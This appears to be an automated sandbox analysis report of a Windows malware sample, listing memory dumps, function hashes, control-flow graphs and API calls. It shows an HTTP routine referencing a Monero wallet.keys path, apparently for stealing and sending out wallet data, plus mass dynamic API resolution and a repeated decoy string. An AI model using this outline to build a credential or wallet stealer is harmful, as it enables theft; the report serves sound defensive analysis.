                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D477B
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46B7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D45D2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D466D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D45F3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4662
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D471E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4770
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4683
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D474F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D45DD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D475A
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4734
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46CD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4765
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D45E8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46D8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D473F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4678
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4713
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D45C7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4638
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: 7f1da86fba17dd4e7e22c8509c94319f33974591378f89fbe486dcb23143f840
                                    • Instruction ID: 6b663c3d68ab8e9476a1e17898f5df04bd8d02d145396f51828bc780a7e21fbd
                                    • Opcode Fuzzy Hash: 7f1da86fba17dd4e7e22c8509c94319f33974591378f89fbe486dcb23143f840
                                    • Instruction Fuzzy Hash: DB4146216CA70C7AE638BBB58C46EBF77535F4BB49F52D040EB005AE90CBB07580752A
                                    Function 000D4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 801 d4880-d4942 call ea7a0 call d47b0 call ea740 * 5 InternetOpenA StrCmpCA 816 d494b-d494f 801->816 817 d4944 801->817 818 d4ecb-d4ef3 InternetCloseHandle call eaad0 call d9ac0 816->818 819 d4955-d4acd call e8b60 call ea920 call ea8a0 call ea800 * 2 call ea9b0 call ea8a0 call ea800 call ea9b0 call ea8a0 call ea800 call ea920 call ea8a0 call ea800 call ea9b0 call ea8a0 call ea800 call ea9b0 call ea8a0 call ea800 call ea9b0 call ea920 call ea8a0 call ea800 * 2 InternetConnectA 816->819 817->816 828 d4ef5-d4f2d call ea820 call ea9b0 call ea8a0 call ea800 818->828 829 d4f32-d4fa2 call e8990 * 2 call ea7a0 call ea800 * 8 818->829 819->818 905 d4ad3-d4ad7 819->905 828->829 906 d4ad9-d4ae3 905->906 907 d4ae5 905->907 908 d4aef-d4b22 HttpOpenRequestA 906->908 907->908 909 d4ebe-d4ec5 InternetCloseHandle 908->909 910 d4b28-d4e28 call ea9b0 call ea8a0 call ea800 call ea920 call ea8a0 call ea800 call ea9b0 call ea8a0 call ea800 call ea9b0 call ea8a0 call ea800 call ea9b0 call ea8a0 call ea800 call ea9b0 call ea8a0 call ea800 call ea920 call ea8a0 call ea800 call ea9b0 call ea8a0 call ea800 call ea9b0 call ea8a0 call ea800 call ea920 call ea8a0 call ea800 call ea9b0 call ea8a0 call ea800 call ea9b0 call ea8a0 call ea800 call ea9b0 call ea8a0 call ea800 call ea9b0 call ea8a0 call ea800 call ea920 call ea8a0 call ea800 call ea740 call ea920 * 2 call ea8a0 call ea800 * 2 call eaad0 lstrlen call eaad0 * 2 lstrlen call eaad0 HttpSendRequestA 908->910 909->818 1021 d4e32-d4e5c InternetReadFile 910->1021 1022 d4e5e-d4e65 1021->1022 1023 d4e67-d4eb9 InternetCloseHandle call ea800 1021->1023 1022->1023 1024 d4e69-d4ea7 call ea9b0 call ea8a0 call ea800 1022->1024 1023->909 1024->1021
                                    APIs
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4839
                                      • Part of subcall function 000D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4849
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000D4915
                                    • StrCmpCA.SHLWAPI(?,00B81328), ref: 000D493A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D4ABA
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,000F0DDB,00000000,?,?,00000000,?,",00000000,?,00B81338), ref: 000D4DE8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000D4E04
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000D4E18
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000D4E49
                                    • InternetCloseHandle.WININET(00000000), ref: 000D4EAD
                                    • InternetCloseHandle.WININET(00000000), ref: 000D4EC5
                                    • HttpOpenRequestA.WININET(00000000,00B812A8,?,00B80BD0,00000000,00000000,00400100,00000000), ref: 000D4B15
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • InternetCloseHandle.WININET(00000000), ref: 000D4ECF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: f09ade9123553e0435cc15e5698a6ab544130ebf64d6b8954d1ab81592f218ee
                                    • Instruction ID: 9926ce01cea06dbe36170a81bd49348bb54aa4bbd10d0041f36f5035b8f69ad3
                                    • Opcode Fuzzy Hash: f09ade9123553e0435cc15e5698a6ab544130ebf64d6b8954d1ab81592f218ee
                                    • Instruction Fuzzy Hash: 51120B71A10258AEDB15EB91DD92FEEB379AF1A300F514199B10672092EF703F49CF62
                                    Function 000E7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000D11B7), ref: 000E7880
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E7887
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 000E789F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 2b9c7cf169731557ee29380b03cebff84fc5769d5f93235db2bb16907684f791
                                    • Instruction ID: 503ed596eccf2c25b1ea0e6266fea90859f64305542215d7b96f3bb2633c5e88
                                    • Opcode Fuzzy Hash: 2b9c7cf169731557ee29380b03cebff84fc5769d5f93235db2bb16907684f791
                                    • Instruction Fuzzy Hash: C0F04FB1D44648EFC710DF99DD49BAEFBBCEB08712F10425AFA05A2680C77415048BA2
                                    Function 000D1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: a301041794beceb8ce2db3c252b0d350769757f661bdef6644d03b98ef7e628c
                                    • Instruction ID: 34bd06103f499e011727bf53253214824121e310e7c6902d4a545ef0b1db1bbd
                                    • Opcode Fuzzy Hash: a301041794beceb8ce2db3c252b0d350769757f661bdef6644d03b98ef7e628c
                                    • Instruction Fuzzy Hash: 76D05E7490130CEBCB01DFE0D84D6DDBB7CFB0C322F000555D90562380EA305581CAA6
                                    Function 000E9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 e9c10-e9c1a 634 ea036-ea0ca LoadLibraryA * 8 633->634 635 e9c20-ea031 GetProcAddress * 43 633->635 636 ea0cc-ea141 GetProcAddress * 5 634->636 637 ea146-ea14d 634->637 635->634 636->637 638 ea216-ea21d 637->638 639 ea153-ea211 GetProcAddress * 8 637->639 640 ea21f-ea293 GetProcAddress * 5 638->640 641 ea298-ea29f 638->641 639->638 640->641 642 ea337-ea33e 641->642 643 ea2a5-ea332 GetProcAddress * 6 641->643 644 ea41f-ea426 642->644 645 ea344-ea41a GetProcAddress * 9 642->645 643->642 646 ea428-ea49d GetProcAddress * 5 644->646 647 ea4a2-ea4a9 644->647 645->644 646->647 648 ea4dc-ea4e3 647->648 649 ea4ab-ea4d7 GetProcAddress * 2 647->649 650 ea515-ea51c 648->650 651 ea4e5-ea510 GetProcAddress * 2 648->651 649->648 652 ea612-ea619 650->652 653 ea522-ea60d GetProcAddress * 10 650->653 651->650 654 ea67d-ea684 652->654 655 ea61b-ea678 GetProcAddress * 4 652->655 653->652 656 ea69e-ea6a5 654->656 657 ea686-ea699 GetProcAddress 654->657 655->654 658 ea708-ea709 656->658 659 ea6a7-ea703 GetProcAddress * 4 656->659 657->656 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(76210000,00B65008), ref: 000E9C2D
                                    • GetProcAddress.KERNEL32(76210000,00B65148), ref: 000E9C45
                                    • GetProcAddress.KERNEL32(76210000,00B79538), ref: 000E9C5E
                                    • GetProcAddress.KERNEL32(76210000,00B79790), ref: 000E9C76
                                    • GetProcAddress.KERNEL32(76210000,00B796E8), ref: 000E9C8E
                                    • GetProcAddress.KERNEL32(76210000,00B79610), ref: 000E9CA7
                                    • GetProcAddress.KERNEL32(76210000,00B6AD60), ref: 000E9CBF
                                    • GetProcAddress.KERNEL32(76210000,00B796B8), ref: 000E9CD7
                                    • GetProcAddress.KERNEL32(76210000,00B794D8), ref: 000E9CF0
                                    • GetProcAddress.KERNEL32(76210000,00B79700), ref: 000E9D08
                                    • GetProcAddress.KERNEL32(76210000,00B79550), ref: 000E9D20
                                    • GetProcAddress.KERNEL32(76210000,00B65328), ref: 000E9D39
                                    • GetProcAddress.KERNEL32(76210000,00B65188), ref: 000E9D51
                                    • GetProcAddress.KERNEL32(76210000,00B650E8), ref: 000E9D69
                                    • GetProcAddress.KERNEL32(76210000,00B65128), ref: 000E9D82
                                    • GetProcAddress.KERNEL32(76210000,00B79640), ref: 000E9D9A
                                    • GetProcAddress.KERNEL32(76210000,00B79568), ref: 000E9DB2
                                    • GetProcAddress.KERNEL32(76210000,00B6B0A8), ref: 000E9DCB
                                    • GetProcAddress.KERNEL32(76210000,00B65168), ref: 000E9DE3
                                    • GetProcAddress.KERNEL32(76210000,00B79580), ref: 000E9DFB
                                    • GetProcAddress.KERNEL32(76210000,00B795B0), ref: 000E9E14
                                    • GetProcAddress.KERNEL32(76210000,00B797A8), ref: 000E9E2C
                                    • GetProcAddress.KERNEL32(76210000,00B79730), ref: 000E9E44
                                    • GetProcAddress.KERNEL32(76210000,00B65228), ref: 000E9E5D
                                    • GetProcAddress.KERNEL32(76210000,00B795F8), ref: 000E9E75
                                    • GetProcAddress.KERNEL32(76210000,00B79628), ref: 000E9E8D
                                    • GetProcAddress.KERNEL32(76210000,00B79718), ref: 000E9EA6
                                    • GetProcAddress.KERNEL32(76210000,00B79760), ref: 000E9EBE
                                    • GetProcAddress.KERNEL32(76210000,00B79658), ref: 000E9ED6
                                    • GetProcAddress.KERNEL32(76210000,00B79778), ref: 000E9EEF
                                    • GetProcAddress.KERNEL32(76210000,00B794F0), ref: 000E9F07
                                    • GetProcAddress.KERNEL32(76210000,00B79670), ref: 000E9F1F
                                    • GetProcAddress.KERNEL32(76210000,00B79688), ref: 000E9F38
                                    • GetProcAddress.KERNEL32(76210000,00B705F8), ref: 000E9F50
                                    • GetProcAddress.KERNEL32(76210000,00B79508), ref: 000E9F68
                                    • GetProcAddress.KERNEL32(76210000,00B79520), ref: 000E9F81
                                    • GetProcAddress.KERNEL32(76210000,00B65268), ref: 000E9F99
                                    • GetProcAddress.KERNEL32(76210000,00B7F4A8), ref: 000E9FB1
                                    • GetProcAddress.KERNEL32(76210000,00B65288), ref: 000E9FCA
                                    • GetProcAddress.KERNEL32(76210000,00B7F4C0), ref: 000E9FE2
                                    • GetProcAddress.KERNEL32(76210000,00B7F550), ref: 000E9FFA
                                    • GetProcAddress.KERNEL32(76210000,00B64FE8), ref: 000EA013
                                    • GetProcAddress.KERNEL32(76210000,00B65028), ref: 000EA02B
                                    • LoadLibraryA.KERNEL32(00B7F2C8,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA03D
                                    • LoadLibraryA.KERNEL32(00B7F4F0,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA04E
                                    • LoadLibraryA.KERNEL32(00B7F568,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA060
                                    • LoadLibraryA.KERNEL32(00B7F388,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA072
                                    • LoadLibraryA.KERNEL32(00B7F340,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA083
                                    • LoadLibraryA.KERNEL32(00B7F4D8,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA095
                                    • LoadLibraryA.KERNEL32(00B7F370,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA0A7
                                    • LoadLibraryA.KERNEL32(00B7F3A0,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA0B8
                                    • GetProcAddress.KERNEL32(751E0000,00B65048), ref: 000EA0DA
                                    • GetProcAddress.KERNEL32(751E0000,00B7F3D0), ref: 000EA0F2
                                    • GetProcAddress.KERNEL32(751E0000,00B791E8), ref: 000EA10A
                                    • GetProcAddress.KERNEL32(751E0000,00B7F418), ref: 000EA123
                                    • GetProcAddress.KERNEL32(751E0000,00B65088), ref: 000EA13B
                                    • GetProcAddress.KERNEL32(700F0000,00B6AF18), ref: 000EA160
                                    • GetProcAddress.KERNEL32(700F0000,00B653A8), ref: 000EA179
                                    • GetProcAddress.KERNEL32(700F0000,00B6B1E8), ref: 000EA191
                                    • GetProcAddress.KERNEL32(700F0000,00B7F478), ref: 000EA1A9
                                    • GetProcAddress.KERNEL32(700F0000,00B7F3E8), ref: 000EA1C2
                                    • GetProcAddress.KERNEL32(700F0000,00B65488), ref: 000EA1DA
                                    • GetProcAddress.KERNEL32(700F0000,00B653C8), ref: 000EA1F2
                                    • GetProcAddress.KERNEL32(700F0000,00B7F358), ref: 000EA20B
                                    • GetProcAddress.KERNEL32(753A0000,00B65608), ref: 000EA22C
                                    • GetProcAddress.KERNEL32(753A0000,00B65628), ref: 000EA244
                                    • GetProcAddress.KERNEL32(753A0000,00B7F328), ref: 000EA25D
                                    • GetProcAddress.KERNEL32(753A0000,00B7F508), ref: 000EA275
                                    • GetProcAddress.KERNEL32(753A0000,00B653E8), ref: 000EA28D
                                    • GetProcAddress.KERNEL32(76310000,00B6AD88), ref: 000EA2B3
                                    • GetProcAddress.KERNEL32(76310000,00B6AF40), ref: 000EA2CB
                                    • GetProcAddress.KERNEL32(76310000,00B7F3B8), ref: 000EA2E3
                                    • GetProcAddress.KERNEL32(76310000,00B656C8), ref: 000EA2FC
                                    • GetProcAddress.KERNEL32(76310000,00B65448), ref: 000EA314
                                    • GetProcAddress.KERNEL32(76310000,00B6AF90), ref: 000EA32C
                                    • GetProcAddress.KERNEL32(76910000,00B7F2E0), ref: 000EA352
                                    • GetProcAddress.KERNEL32(76910000,00B656E8), ref: 000EA36A
                                    • GetProcAddress.KERNEL32(76910000,00B79288), ref: 000EA382
                                    • GetProcAddress.KERNEL32(76910000,00B7F400), ref: 000EA39B
                                    • GetProcAddress.KERNEL32(76910000,00B7F430), ref: 000EA3B3
                                    • GetProcAddress.KERNEL32(76910000,00B655C8), ref: 000EA3CB
